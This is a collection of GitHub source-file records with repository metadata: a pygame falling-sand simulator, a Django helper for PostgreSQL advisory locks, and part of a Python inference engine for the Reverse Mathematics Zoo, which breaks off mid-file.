"alphanum_fraction": 0.5246186256408691, "avg_line_length": 23.628713607788086, "blob_id": "9a7b5b1ee1e8babffc69f3c372160cfd4da4f1a8", "content_id": "d8e54c2ab12e2054e1b74df9192809de51712abc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5179, "license_type": "permissive", "max_line_length": 176, "num_lines": 202, "path": "/SandFull.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, math\r\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray 
= (150, 150, 150)\r\n\r\nsandl = []\r\nbarl = []\r\nclock = pygame.time.Clock()\r\nboard = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))]\r\nboard[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\nfor i in range(0,math.ceil(screen.get_height()/5)-1):\r\n\tboard[i][0] = 1\r\n\tboard[i][math.ceil(screen.get_width()/5)-1] = 1\r\nr = v = random.randint(10,245)\r\ng = n = random.randint(10,245)\r\nb = m = random.randint(10,245)\r\nr1 = 1\r\ng1 = 0\r\nb1 = 1\r\nrg1 = 0\r\ngg1 = 1\r\nbg1 = 0\r\nrg = 250\r\ngg = 250\r\nbc = 250\r\n\r\nwhile (True):\r\n\tclock.tick(60)\r\n\tscreen.fill((rg,gg,bc))\r\n\r\n\tif (True):\r\n\t\tif (rg > 253):\r\n\t\t\trg1 = 0\r\n\t\tif (rg < 240):\r\n\t\t\trg1 = 1\t\r\n\t\tif (rg1 == 1):\r\n\t\t\trg = rg + .05\t\t\t\r\n\t\tif (rg1 == 0):\r\n\t\t\trg = rg - .05\r\n\t\tif (gg > 253):\r\n\t\t\tgg1 = 0\r\n\t\tif (gg < 240):\r\n\t\t\tgg1 = 1\r\n\t\tif (gg1 == 1):\r\n\t\t\tgg = gg + .1\t\r\n\t\tif (gg1 == 0):\r\n\t\t\tgg = gg - .1\t\r\n\t\tif (bc > 253):\r\n\t\t\tbg1 = 0\t\t\r\n\t\tif (bc < 240):\r\n\t\t\tbg1 = 1\t\t\r\n\t\tif (bg1 == 1):\r\n\t\t\tbc = bc + .15\t\r\n\t\tif (bg1 == 0):\r\n\t\t\tbc = bc - .15\r\n\t\r\n\tif (pygame.mouse.get_pressed()[0]):\r\n\t\tif (r > 253):\r\n\t\t\tr1 = 0\t\r\n\t\tif (r < 2):\r\n\t\t\tr1 = 1\t\t\r\n\t\tif (r1 == 1):\r\n\t\t\tr = r + .15\t\t\t\r\n\t\tif (r1 == 0):\r\n\t\t\tr = r - .15\r\n\t\tif (g > 253):\r\n\t\t\tg1 = 0\t\t\r\n\t\tif (g < 2):\r\n\t\t\tg1 = 1\t\t\r\n\t\tif (g1 == 1):\r\n\t\t\tg = g + .1\t\t\r\n\t\tif (g1 == 0):\r\n\t\t\tg = g - .1\t\r\n\t\tif (b > 253):\r\n\t\t\tb1 = 0\t\t\r\n\t\tif (b < 2):\r\n\t\t\tb1 = 1\r\n\t\tif (b1 == 1):\r\n\t\t\tb = b + .05\t\t\t\r\n\t\tif (b1 == 0):\r\n\t\t\tb = b - .05\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b)\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (abs(self.velox) < .5):\r\n\t\t\t\tself.velox = random.randint(-48,48)/80\r\n\t\t\tself.x = xm\r\n\t\t\tself.y = ym\r\n\t\t\tself.yf = int(self.y)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:\r\n\t\t\t\tself.velox -= .01\r\n\t\t\tif self.velox < 0 :\r\n\t\t\t\tself.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:\r\n\t\t\t\tself.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < (math.ceil(screen.get_height()/5)-1) and 0 < self.x < (math.ceil(screen.get_width()/5)-1):\r\n\t\t\t\tboard[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.y += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.d = random.randint(0,1)\r\n\t\t\t\tif self.d == 0:\r\n\t\t\t\t\tself.x += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.x -= 1\r\n\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x -= 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] 
== 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] == 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] == 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x -= 1\r\n\t\t\t\t\r\n\t\t\tself.yf = int(round(self.y,0))\r\n\t\t\t\r\n\t\t\tpygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\t\t\t\r\n\tclass Barrier():\r\n\t\tdef __init__(self):\r\n\t\t\tself.x = int(xm)\r\n\t\t\tself.y = int(ym)\r\n\t\t\t\r\n\t\tdef ShowBarrier(self):\r\n\t\t\tboard[self.y][self.x] = 1\r\n\t\t\tboard[self.y+1][self.x+1] = 1\r\n\t\t\tboard[self.y+1][self.x] = 1\r\n\t\t\tboard[self.y+1][self.x-1] = 1\r\n\t\t\tboard[self.y][self.x+1] = 1\r\n\t\t\tboard[self.y][self.x-1] = 1\r\n\t\t\tboard[self.y-1][self.x+1] = 1\r\n\t\t\tboard[self.y-1][self.x] = 1\r\n\t\t\tboard[self.y-1][self.x-1] = 1\t\t\t\r\n\t\t\tpygame.draw.rect(screen, black, (self.x*5-5,self.y*5-5,15,15),0)\r\n\t\t\t\r\n\t\t\t\r\n\tpygame.draw.rect(screen, (v,n,m), (0,screen.get_height()-5,screen.get_width(),5),0)\r\n\tpygame.draw.rect(screen, (v,n,m), (0,0,5,screen.get_width()),0)\r\n\tpygame.draw.rect(screen, (v,n,m), (screen.get_width()-5,0,5,screen.get_height()),0)\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\txp = xa%5\r\n\txm = (xa-xp)/5\r\n\typ = ya%5\r\n\tym = (ya-yp)/5\r\n\t\r\n\tif pygame.mouse.get_pressed()[2]:\r\n\t\tbar = Barrier()\r\n\t\tbarl.append(bar)\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\ttry:\r\n\t\t\tsandl[i].Fall()\r\n\t\texcept IndexError:\r\n\t\t\tpass\r\n\t\t\t\r\n\tfor i in range(0,len(barl)):\r\n\t\ttry:\r\n\t\t\tbarl[i].ShowBarrier()\r\n\t\texcept IndexError:\r\n\t\t\tpass\t\t\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif pygame.key.get_pressed()[pygame.K_ESCAPE]:\r\n\t\tbreak\r\n\r\n" } ]
6
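Stripped of the pygame rendering, the update rule the SandSimulator files above implement is a small cellular step on the occupancy grid: a grain falls if the cell below is empty, and otherwise tries to slide into a free diagonal. A minimal self-contained sketch of that rule (grid values 0/1, row 0 at the top; this is a distillation, not code from the repo):

```python
import random

def step_grain(board, x, y):
    """Move one grain at (x, y) a single step; returns its new position."""
    h, w = len(board), len(board[0])
    if y + 1 >= h:
        return x, y  # resting on the floor
    board[y][x] = 0
    if board[y + 1][x] == 0:
        y += 1  # fall straight down
    else:
        # Slide toward a free diagonal, choosing randomly when both are open.
        options = [d for d in (-1, 1)
                   if 0 <= x + d < w and board[y + 1][x + d] == 0]
        if options:
            x += random.choice(options)
            y += 1
        # otherwise the grain is blocked on all sides and stays put
    board[y][x] = 1
    return x, y
```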
iXce/django-pglocks
https://github.com/iXce/django-pglocks
47277eefb951754eb80af24aeb85801f8c1aa7fa
d4ae655e5d136afff8377070958547dffb72f814
bdacf39ba5fae93a1dfe25e72196f91552884ccc
refs/heads/master
2020-12-25T05:29:18.668812
2016-09-17T21:12:14
2016-09-17T21:12:14
67,877,659
0
0
null
2016-09-10T15:09:05
2016-04-11T11:44:40
2016-04-11T12:02:01
null
[ { "alpha_fraction": 0.553398072719574, "alphanum_fraction": 0.5649859309196472, "avg_line_length": 30.93000030517578, "blob_id": "a3d3637e097e4f191e9122c92e30e98c2b9ed93a", "content_id": "de0ca41b5d38ab1d529b53507727f1484ac0a393", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3193, "license_type": "permissive", "max_line_length": 110, "num_lines": 100, "path": "/django_pglocks/__init__.py", "repo_name": "iXce/django-pglocks", "src_encoding": "UTF-8", "text": "from zlib import crc32\nfrom django.utils import six\n\n__version__ = '1.0.2'\n\nclass advisory_lock(object):\n\n def __init__(self, lock_id, shared=False, wait=True, using=None, connection=None):\n self.lock_id = lock_id\n self.shared = shared\n self.wait = wait\n\n # The `connection` can set to an instance of :class:`psycopg2.connection`.\n # If missing then the connection is retrieved with Django.\n\n if connection:\n assert not using\n else:\n from django.db import DEFAULT_DB_ALIAS, connections\n if using is None:\n using = DEFAULT_DB_ALIAS\n connection = connections[using]\n\n self.using = using\n self.connection = connection\n self.cursor = None\n\n # Assemble the function name based on the options.\n function_name = 'pg_'\n\n if not self.wait:\n function_name += 'try_'\n\n function_name += 'advisory_lock'\n\n if self.shared:\n function_name += '_shared'\n\n release_function_name = 'pg_advisory_unlock'\n if self.shared:\n release_function_name += '_shared'\n\n # Format up the parameters.\n\n tuple_format = False\n\n if isinstance(lock_id, (list, tuple,)):\n if len(lock_id) != 2:\n raise ValueError(\"Tuples and lists as lock IDs must have exactly two entries.\")\n\n if not isinstance(lock_id[0], six.integer_types) or not isinstance(lock_id[1], six.integer_types):\n raise ValueError(\"Both members of a tuple/list lock ID must be integers\")\n\n tuple_format = True\n elif isinstance(lock_id, six.string_types):\n # Generates an id within postgres integer range (-2^31 to 2^31 - 1).\n # crc32 generates an unsigned integer in Py3, we convert it into\n # a signed integer using 2's complement (this is a noop in Py2)\n pos = crc32(lock_id.encode(\"utf-8\"))\n lock_id = (2 ** 31 - 1) & pos\n if pos & 2 ** 31:\n lock_id -= 2 ** 31\n elif not isinstance(lock_id, six.integer_types):\n raise ValueError(\"Cannot use %s as a lock id\" % lock_id)\n\n if tuple_format:\n base = \"SELECT %s(%d, %d)\"\n params = (lock_id[0], lock_id[1],)\n else:\n base = \"SELECT %s(%d)\"\n params = (lock_id,)\n\n self.query_base = base\n self.acquire_params = (function_name, ) + params\n self.release_params = (release_function_name, ) + params\n\n def acquire(self):\n command = self.query_base % self.acquire_params\n self.cursor = self.connection.cursor()\n\n self.cursor.execute(command)\n\n if not self.wait:\n self.acquired = self.cursor.fetchone()[0]\n else:\n self.acquired = True\n return self.acquired\n\n def release(self):\n if self.acquired:\n command = self.query_base % self.release_params\n self.cursor.execute(command)\n self.acquired = False\n self.cursor.close()\n\n def __enter__(self):\n return self.acquire()\n\n def __exit__(self):\n return self.release()\n" } ]
1
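Based on the class above, `advisory_lock` is a context manager whose `__enter__` returns whether the PostgreSQL advisory lock was obtained. A short usage sketch (the lock name is arbitrary, and a configured Django/PostgreSQL connection is assumed):

```python
from django_pglocks import advisory_lock

# Blocking form: waits until the session-level advisory lock is free.
with advisory_lock("nightly-rebuild"):
    pass  # ... critical section ...

# Non-blocking form: wait=False makes __enter__ return False if the
# lock is already held elsewhere, instead of waiting for it.
with advisory_lock("nightly-rebuild", wait=False) as acquired:
    if acquired:
        pass  # ... critical section ...
```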
TonichaC/rmzoo
https://github.com/TonichaC/rmzoo
09849bffb84da198ce99e37784d91e746b19a5cc
dedec22f017a63b58662426689bb04444076dabf
3a1751606804a73000072708144e127264d43a79
refs/heads/master
2021-01-07T08:35:50.873433
2020-02-20T13:35:29
2020-02-20T13:35:29
241,636,800
0
0
MIT
2020-02-19T14:05:20
2020-02-18T13:48:00
2018-09-07T08:20:18
null
[ { "alpha_fraction": 0.5104838013648987, "alphanum_fraction": 0.5156267881393433, "avg_line_length": 35.939456939697266, "blob_id": "0aa0d7ab9268a380a158daa5bb6d2cf136bc2975", "content_id": "960178b8199baa746f5d9acf67df94b5ea86dbd3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35388, "license_type": "permissive", "max_line_length": 154, "num_lines": 958, "path": "/rmupdater.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n##################################################################################\n#\n# The Reverse Mathematics Zoo Updater\n# by Damir Dzhafarov\n# - Version 1.0 started August, 2010\n# - Version 2.0 started August, 2013\n# Revised by Eric Astor\n# - Version 3.0 - 29 May 2016\n# - Version 4.0 - started 30 May 2016\n# - Version 4.1 - optimizations & refactoring, started 2 July 2016\n# - Version 4.2 - new forms and reasoning, started 12 July 2016\n# - Version 4.3 - changed internal representations, started 21 July 2016\n# - Version 4.4 - moved to a shelf database, started 25 July 2016\n# - Version 5.0 - clean implementation of inference rules, started 1 August 2016\n# - Version 5.1 - reverted from shelf database for cross-platform compatibility, started 16 August 2016\n# Documentation and support: http://rmzoo.uconn.edu\n#\n##################################################################################\n\nfrom __future__ import print_function\n\nimport itertools\nimport sys\nimport \n\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString, lru_cache\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nDate = u'16 August 2016'\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nversion, versionPoint = sys.version_info[0:2]\nif version >= 3 and versionPoint >= 3:\n timekeeper = time.perf_counter\nelse:\n timekeeper = time.clock\n\nfrom rmBitmasks import *\nfrom renderJustification import *\n\nRCAprinciple = u'RCA'\n\nprinciplesList = [RCAprinciple]\nprinciples = set(principlesList)\n\ndef addPrinciple(a):\n setA = set(a.split(u'+'))\n a = u'+'.join(sorted(setA))\n principles.add(a)\n principles.update(setA)\n return a\n\nconjunction = {}\ndef joinPrinciples(a, b):\n try:\n return conjunction[a,b]\n except KeyError:\n p = u'+'.join(sorted(set(a.split(u'+')) | set(b.split(u'+'))))\n if p not in principles:\n p = None\n conjunction[a,b] = p\n conjunction[b,a] = p\n return p\n\nequivalent = defaultdict(noReduction)\nimplies = defaultdict(noReduction)\nnotImplies = defaultdict(noReduction)\n\ndef addEquivalent(a,reduction,b):\n equivalent[a,b] |= Reduction.weaker(reduction)\n\ndef addReduction(a,reduction,b):\n implies[a,b] |= Reduction.weaker(reduction)\n\ndef addNonReduction(a,reduction,b):\n notImplies[a,b] |= Reduction.stronger(reduction)\n\nconservative = defaultdict(noForm)\nnonConservative = defaultdict(noForm)\n\ndef addConservative(a,frm,b):\n conservative[a,b] |= Form.stronger(frm)\n\ndef addNonConservative(a,frm,b):\n nonConservative[a,b] |= Form.weaker(frm)\n\nform = defaultdict(noForm)\n\nprimary = set()\nprimaryIndex = []\n\ndef addForm(a, frm):\n form[a] |= Form.weaker(frm)\n\ndef addPrimary(a):\n primary.add(a)\n primaryIndex.append(a)\n\njustify = {}\njustComplexity = {}\n\ndef updateJustification(fact, jst, cplx):\n try:\n if cplx >= justComplexity[fact]:\n return False\n except KeyError:\n pass\n justify[fact] = 
jst\n justComplexity[fact] = cplx\n return True\n\ndef unoptimizedJustification(fact, jst, cplx):\n if fact in justify:\n return False\n else:\n justify[fact] = jst\n return True\n\nclass UnjustifiedFactError(Exception):\n def __init__(self, a, op, b):\n super(UnjustifiedFactError, self).__init__(u'The fact \"{0}\" is not justified.'.format(printFact(a, op, b)))\n\ndef addUnjustified(a, op, b):\n raise UnjustifiedFactError(a, op, b)\n\nclass ContradictionError(Exception):\n def __init__(self, fact1, fact2):\n super(ContradictionError, self).__init__(u'The following facts are contradictory:\\n\\n' +\n printJustification(fact1, justify) + u'\\n\\n' +\n printJustification(fact2, justify))\n\n# Noted side-effects:\n# Changing '<->' can affect '->'\n# Changing '->' can affect 'c' and '<->'\n# Changing 'c' can affect '->'\n# Changing '-|>' can affect 'nc'\n# Changing 'nc' can affect '-|>'\ndef addFact(a, op, b, jst, cplx):\n fact = (a, op, b)\n if not updateJustification(fact, jst, cplx):\n return False\n opCtx,opCore = op\n \n ref = (fact,)\n refCplx = 1 + cplx\n \n if opCore == u'<->': # equivalence\n # Symmetry:\n # IF (a X<-> b), THEN (b X<-> a).\n updateJustification((b, op, a), jst, cplx)\n \n for x in Reduction.list(Reduction.weaker(opCtx)):\n newOp = (x, u'<->')\n \n addEquivalent(a, x, b)\n updateJustification((a, newOp, b), ref, refCplx)\n \n # Symmetry:\n # IF (a X<-> b), THEN (b X<-> a).\n addEquivalent(b, x, a)\n updateJustification((b, newOp, a), ref, refCplx)\n \n # Definition of equivalence:\n # IF (a X<-> b), THEN (a X-> b) AND (b X-> a).\n impliesOp = (opCtx, u'->')\n addFact(a, impliesOp, b, (fact,), refCplx)\n addFact(b, impliesOp, a, (fact,), refCplx)\n elif opCore == u'->': # implication\n for x in Reduction.list(Reduction.weaker(opCtx)):\n addReduction(a, x, b)\n updateJustification((a, (x, u'->'), b), ref, refCplx)\n \n if Reduction.isPresent(x, notImplies[a,b]):\n raise ContradictionError((a, (x, u'->'), b), (a, (x, u'-|>'), b))\n \n if x == Reduction.RCA:\n if x == opCtx:\n newRef = ref\n newRefCplx = refCplx\n else:\n newRef = ((a, (x, u'->'), b),)\n newRefCplx = 1 + refCplx\n \n # Trivial conservation:\n # IF (a RCA-> b), THEN (b Fc a).\n for f in Form:\n if f != Form.none:\n addFact(b, (f, u'c'), a, newRef, newRefCplx)\n \n # Definition of conjunction (special case):\n # IF (a X-> b), THEN (a X<-> a+b).\n ab = joinPrinciples(a,b)\n if ab is not None:\n addFact(a, (opCtx, u'<->'), ab, ref, refCplx)\n elif opCore == u'-|>': # non-implication\n for x in Reduction.list(Reduction.stronger(opCtx)):\n addNonReduction(a, x, b)\n updateJustification((a, (x, u'-|>'), b), ref, refCplx)\n \n if Reduction.isPresent(x, implies[a,b]):\n raise ContradictionError((a, (x, u'-|>'), b), (a, (x, u'->'), b))\n \n if x == Reduction.RCA:\n if x == opCtx:\n newFact = fact\n newCplx = 1 + refCplx\n else:\n newFact = (a, (x, u'-|>'), b)\n newCplx = 2 + refCplx\n \n # Definition of non-conservation (special case):\n # IF (a RCA-|> b) AND (b form F), THEN (b nFc a).\n for f in Form.list(form[b]):\n addFact(b, (f, u'nc'), a, (newFact, (b, u'form', f)), newCplx)\n elif opCore == u'c': # conservation\n for f in Form.list(Form.stronger(opCtx)):\n newFact = (a, (f, u'c'), b)\n \n addConservative(a, f, b)\n updateJustification(newFact, ref, refCplx)\n \n if Form.isPresent(f, nonConservative[a,b]):\n raise ContradictionError((a, (f, u'c'), b), (a, (f, u'nc'), b))\n \n # Definition of conservation (special case):\n # IF (a Fc b) AND (a form F), THEN (b RCA-> a).\n if Form.isPresent(f, form[a]):\n if f 
== opCtx:\n newCplx = 1 + refCplx\n else:\n newCplx = 2 + refCplx\n \n addFact(b, (Reduction.RCA, u'->'), a, (newFact, (a, u'form', f)), newCplx)\n elif opCore == u'nc': # non-conservation\n for f in Form.list(Form.weaker(opCtx)):\n addNonConservative(a, f, b)\n updateJustification((a, (f, u'nc'), b), ref, refCplx)\n \n if Form.isPresent(f, conservative[a,b]):\n raise ContradictionError((a, (f, u'nc'), b), (a, (f, u'c'), b))\n \n # Trivial conservation (contrapositive):\n # IF (a nFc b), THEN (b RCA-|> a).\n addFact(b, (Reduction.RCA, u'-|>'), a, ref, refCplx)\n else:\n raise ValueError(u'Unrecognized operator: ' + opCore)\n \n return True\n\ndef standardizePrinciple(a):\n return u'+'.join(sorted(set(a.split(u'+'))))\ndef standardizeFact(a, op, b):\n a = standardizePrinciple(a)\n if op != u'form':\n b = standardizePrinciple(b)\n if op[1] == u'<=':\n op = (op[0], u'->')\n a,b = b,a\n elif op[1] == u'</=':\n op = (op[0], u'-|>')\n a,b = b,a\n return a, op, b\n\nfrom pyparsing import *\ndef parseResults(resultsString, quiet=False):\n start = timekeeper()\n if not quiet: eprint(u'Parsing results...')\n # Name parsed strings\n name = Word( alphas+\"_+^{}\\\\$\", alphanums+\"_+^{}$\\\\\").setParseAction(lambda s,l,t: addPrinciple(t[0]))\n \n parenth = Literal('\"')\n justification = QuotedString('\"\"\"',multiline=True) | quotedString.setParseAction(removeQuotes)\n \n _reductionName = NoMatch()\n for r in Reduction:\n if r != Reduction.none:\n _reductionName |= Literal(r.name)\n for r in Reduction.alias:\n if r != u'':\n _reductionName |= Literal(r)\n _reductionType = _reductionName.setParseAction(lambda s,l,t: [Reduction.fromString(t[0])])\n reductionType = Optional(_reductionType, default=Reduction.RCA)\n postfixReductionType = Optional(Suppress(Literal(\"_\")) + _reductionType, default=Reduction.RCA)\n \n implication = (reductionType + Literal(\"->\")) | (Literal(\"=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"->\"])\n nonImplication = (reductionType + Literal(\"-|>\")) | (Literal(\"=/>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"-|>\"])\n equivalence = (reductionType + Literal(\"<->\")) | (Literal(\"<=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<->\"])\n \n reduction = (Literal(\"<=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<=\"])\n nonReduction = (Literal(\"</=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"</=\"])\n \n _formName = NoMatch()\n for f in Form:\n if f != Form.none:\n _formName |= Literal(f.name)\n formType = _formName.setParseAction(lambda s,l,t: [Form.fromString(t[0])])\n \n conservation = formType + Literal(\"c\")\n nonConservation = (Literal(\"n\") + formType + Literal(\"c\")).setParseAction(lambda s,l,t: [t[1], \"nc\"])\n \n operator = implication | nonImplication | reduction | nonReduction | equivalence | conservation | nonConservation\n \n # Results file lines\n unjustified = (name + Group(operator) + name + ~justification).setParseAction(lambda s,l,t: addUnjustified(*standardizeFact(t[0], tuple(t[1]), t[2])))\n \n factsToAdd = []\n def _addFactParseAction(s,l,t):\n a,op,b = standardizeFact(t[0], tuple(t[1]), t[2])\n factsToAdd.append(((a, op, b), t[3]))\n fact = (name + Group(operator) + name + justification).setParseAction(_addFactParseAction)\n\n formDef = (name + Literal(\"form\") + formType).setParseAction(lambda s,l,t: addForm(t[0], t[2]))\n primary = (name + Literal(\"is primary\")).setParseAction(lambda s,l,t: addPrimary(t[0]))\n \n comments = 
Suppress(Literal( \"#\" ) + SkipTo(LineEnd()))\n \n # Represent and parse results file\n entry = fact | formDef | primary | unjustified | comments\n results = ZeroOrMore( entry ) + StringEnd()\n \n results.parseString(resultsString)\n \n global principlesList\n principlesList = sorted(principles)\n \n for (a, op, b), jst in factsToAdd:\n addFact(a, op, b, jst, 1)\n \n if not quiet: eprint(u'Principles found: {0:,d}'.format(len(principlesList)))\n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n\n# General fact; uses nothing, affects '<->', '->', and 'c'\ndef addReflexivities():\n for a in principlesList:\n for x in Reduction:\n if x == Reduction.none: continue\n \n # (a X-> a)\n addFact(a, (x, u'<->'), a, u'reflexivity', 1)\n \n # (a X<-> a)\n addFact(a, (x, u'->'), a, u'reflexivity', 1)\n \n for f in Form:\n if f == Form.none: continue\n \n # (a Fc a)\n addFact(a, (f, u'c'), a, u'reflexivity', 1)\n\n# General fact; uses nothing, affects '->'\ndef addRCABottom():\n # (a X-> RCA)\n for a in principlesList:\n for x in Reduction:\n if x == Reduction.none: continue\n \n addFact(a, (x, u'->'), RCAprinciple, u'', 1)\n\n# General fact; uses nothing, affects '->'\ndef definitionOfConjunction():\n # IF (a == b+...), THEN (a X-> b).\n for a in principlesList:\n splitA = set(a.split(u'+'))\n if len(splitA) == 1: continue\n \n for b in principlesList:\n if b == a: continue\n \n splitB = set(b.split(u'+'))\n if splitB <= splitA:\n for x in Reduction:\n if x == Reduction.none: continue\n \n addFact(a, (x, u'->'), b, u'', 1)\n\n# Uses '->', affects '<->'\ndef definitionOfEquivalence():\n #a X<-> b\n #WHEN\n # (a X-> b) AND (b X-> a)\n \n r = False\n for a,b in itertools.combinations(principlesList, 2):\n equiv = implies[a,b] & implies[b,a]\n \n if equiv != Reduction.none:\n for x in Reduction.list(equiv):\n imp = (x, u'->')\n aImpB = (a, imp, b)\n bImpA = (b, imp, a)\n \n r |= addFact(a, (x, u'<->'), b,\n (aImpB, bImpA), 1 + justComplexity[aImpB] + justComplexity[bImpA])\n return r\n\n# Uses array, affects array\ndef transitiveClosure(array, opName, clsCtx):\n # Complete (current) transitive closure of array, using Floyd-Warshall\n \n r = False\n for c in principlesList:\n for a in principlesList:\n if a == c: continue\n \n acRelation = array[a,c]\n if acRelation == clsCtx.none: continue\n \n for b in principlesList:\n if b == a or b == c: continue\n \n transitive = acRelation & array[c,b]\n if transitive == clsCtx.none: continue\n \n for x in clsCtx.list(transitive):\n op = (x, opName)\n aOpC = (a, op, c)\n cOpB = (c, op, b)\n \n r |= addFact(a, op, b,\n (aOpC, cOpB), 1 + justComplexity[aOpC] + justComplexity[cOpB])\n return r\n\n# Uses '->', affects '->'\ndef unifyOverConjunctions():\n #a X-> b\n #WHEN\n # (b == c+d) AND (a X-> c) AND (a X-> d) \"Definition of conjunction\"\n \n r = False\n for b in principlesList:\n splitB = b.split(u'+')\n if len(splitB) == 1: continue # b is not a conjunction\n \n for a in principlesList:\n aImpliesAll = ~Reduction.none\n for p in splitB:\n aImpliesAll &= implies[a,p]\n if aImpliesAll == Reduction.none: continue\n \n for x in Reduction.list(aImpliesAll):\n aImpConjuncts = tuple([(a, (x, u'->'), t) for t in splitB])\n r |= addFact(a, (x, u'->'), b,\n aImpConjuncts, 1 + sum(justComplexity[aImpX] for aImpX in aImpConjuncts))\n return r\n\n#REDUNDANT\n# Uses 'c' and '->', affects '->'\ndef definitionOfConservation():\n #a RCA-> b\n #WHEN\n # (c Fc a) AND (c RCA-> b) AND (b has form F) \"Definition of conservation\"\n \n r = False\n for c in 
principlesList:\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,b]):\n formB = form[b]\n if formB == Form.none: continue\n \n cImpB = (c, (Reduction.RCA, u'->'), b)\n refCplxCB = 2 + justComplexity[cImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n frms = formB & conservative[c,a]\n if frms == Form.none: continue\n \n for f in Form.list(frms):\n cConsA = (c, (f, u'c'), a)\n \n r |= addFact(a, (Reduction.RCA, u'->'), b,\n (cConsA, cImpB, (b, u'form', f)), refCplxCB + justComplexity[cConsA])\n return r\n\n# Uses posArray and negArray, affects negArray\ndef contrapositiveTransitivity(posArray, posOpName, negArray, negOpName, clsCtx):\n r = False\n for c in principlesList:\n for a in principlesList:\n if a == c: continue\n \n #a nop b\n #WHEN\n # (c op a) AND (c nop b)\n caRelation = posArray[c,a]\n if caRelation != clsCtx.none:\n for b in principlesList:\n if b == a or b == c: continue\n \n contexts = caRelation & negArray[c,b]\n if contexts == clsCtx.none: continue\n \n for ctx in clsCtx.list(contexts):\n nop = (ctx, negOpName)\n \n cOpA = (c, (ctx, posOpName), a)\n cNOpB = (c, nop, b)\n \n r |= addFact(a, nop, b,\n (cOpA, cNOpB), 1 + justComplexity[cOpA] + justComplexity[cNOpB])\n \n #a nop b\n #WHEN\n # (a nop c) AND (b op c)\n acNRelation = negArray[a,c]\n if acNRelation != clsCtx.none:\n for b in principlesList:\n if b == a or b == c: continue\n \n contexts = acNRelation & posArray[b,c]\n if contexts == clsCtx.none: continue\n \n for ctx in clsCtx.list(contexts):\n nop = (ctx, negOpName)\n \n aNOpC = (a, nop, c)\n bOpC = (b, (ctx, posOpName), c)\n \n r |= addFact(a, nop, b,\n (aNOpC, bOpC), 1 + justComplexity[aNOpC] + justComplexity[bOpC])\n return r\n\n# Uses 